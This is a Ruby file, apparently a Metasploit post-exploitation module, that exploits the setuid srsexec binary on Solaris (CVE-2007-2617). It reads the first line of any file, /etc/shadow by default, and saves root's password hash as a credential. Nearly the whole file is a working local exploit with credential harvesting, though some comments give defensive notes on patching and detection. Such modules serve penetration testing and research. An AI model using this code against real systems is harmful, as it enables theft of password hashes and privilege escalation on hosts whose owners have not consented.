Path: blob/master/modules/post/solaris/escalate/srsexec_readline.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-exploitation module that reads the first line of a file on a Solaris
# host through the setuid srsexec binary shipped with NetConnect
# (CVE-2007-2617, see the References below).
#
# Defender notes: `check` treats a srsexec that is no longer setuid as an
# already-patched host, so clearing that bit or applying the vendor fix from
# the Sun alert referenced below removes the exposure. The module runs
# `srsexec -dvb <FILE> <token>` on the target; that invocation of srsexec with
# the debug/verbose flags by a non-root user is the observable artefact.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Solaris::System
  include Msf::Post::Solaris::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Solaris srsexec Arbitrary File Reader',
        'Description' => %q{
          This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.
          When srsexec is executed in debug (-d) verbose (-v) mode,
          the first line of an arbitrary file can be read due to the suid bit set.
          The most widely accepted exploitation vector is reading /etc/shadow,
          which will reveal root's hash for cracking.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # metasploit module
          'iDefense' # discovery reported anonymously to https://labs.idefense.com
        ],
        'Platform' => ['solaris'],
        'SessionTypes' => ['shell', 'meterpreter'],
        'References' => [
          ['CVE', '2007-2617'],
          ['URL', 'https://download.oracle.com/sunalerts/1000443.1.html'],
          ['URL', 'https://www.securityfocus.com/archive/1/468235'],
          ['EDB', '30021'],
          ['BID', '23915']
        ],
        'DisclosureDate' => '2007-05-07'
      )
    )
    register_options([
      OptString.new('FILE', [true, 'File to read the first line of', '/etc/shadow'])
    ])
  end

  # Absolute path of the setuid NetConnect binary the module relies on.
  #
  # @return [String]
  def suid_bin_path
    '/opt/SUNWsrspx/bin/srsexec'
  end

  # Decides whether the target looks exploitable.
  #
  # Aborts the whole module when the session is already root. Otherwise prints
  # the reason and returns false when the NetConnect uninstaller cannot be
  # found, its version lies outside 3.2.3..3.2.4, or srsexec is not setuid;
  # returns true when all three tests pass.
  #
  # @return [Boolean] true when the target appears vulnerable
  def check
    fail_with Failure::BadConfig, 'Session already has root privileges' if is_root?

    # Version discovery follows the Sun alert: the uninstaller filename carries
    # the installed NetConnect version (exactly eleven digits/dots).
    listing = cmd_exec '/usr/bin/ls /opt/SUNWsrspx/bin/UninstallNetConnect.*.sh'
    version_match = /UninstallNetConnect\.([\d.]{11})\.sh/.match(listing)
    unless version_match
      print_error 'NetConnect uninstall not found, either not installed or too new'
      return false
    end

    # Each dotted segment passes through to_i, so leading zeros do not skew the comparison.
    version = Rex::Version.new(version_match[1].split('.').map(&:to_i).join('.'))
    lowest = Rex::Version.new('3.2.3')
    highest = Rex::Version.new('3.2.4')
    # NOTE(review): the Description names 3.2.3 and 3.2.5, while this range accepts
    # 3.2.3 through 3.2.4 — confirm against the Sun alert which is intended.
    unless version.between?(lowest, highest)
      print_error "#{version} is not vulnerable"
      return false
    end
    print_good "#{version} is vulnerable"

    # A srsexec without the setuid bit is treated as an already-patched host.
    return true if setuid? suid_bin_path

    vprint_error "#{suid_bin_path} is not setuid, it must have been manually patched"
    false
  end

  # Reads the first line of datastore['FILE'] through srsexec and, only when
  # that file is /etc/shadow, records the recovered user:hash pair as a
  # credential.
  #
  # Calls fail_with (and therefore does not return) when `check` fails.
  def run
    fail_with Failure::NotVulnerable, 'Target is not vulnerable' unless check

    # FILE is interpolated unquoted, so a path containing whitespace or shell
    # metacharacters reaches the remote shell as-is. The random token is simply
    # handed to srsexec as its final argument.
    token = Rex::Text.rand_text_alpha 5
    output = cmd_exec("#{suid_bin_path} -dvb #{datastore['FILE']} #{token}")
    vprint_good("Raw Command Output: #{output}")

    first_line = reassemble_first_line(output)
    return if first_line.empty?

    print_good("First line of #{datastore['FILE']}: #{first_line}")
    return unless datastore['FILE'] == '/etc/shadow'

    print_good("Adding root's hash to the credential database.")
    # A shadow entry is user:hash:...; only the first two fields are stored.
    username, secret = first_line.split(':')
    credential = {
      origin_type: :session,
      session_id: session_db_id,
      workspace_id: myworkspace_id,
      post_reference_name: fullname,
      username: username,
      private_data: secret,
      private_type: :nonreplayable_hash
    }
    create_credential(credential)
  end

  private

  # Rebuilds the file's first line from srsexec's output.
  #
  # srsexec prints the line in 20-character pieces, each on its own
  # "binaries file line: " row. Every piece after the first repeats the last
  # two characters of the previous one, so a full 20-character piece contributes
  # only its first 18 characters, while a shorter piece is kept whole.
  #
  # @param output [String] raw srsexec output
  # @return [String] the reassembled line, or "" when no matching row exists
  def reassemble_first_line(output)
    pieces = output.scan(/binaries file line: (.+)$/).map(&:first)
    pieces.map { |piece| piece.length == 20 ? piece[0..17] : piece }.join
  end
end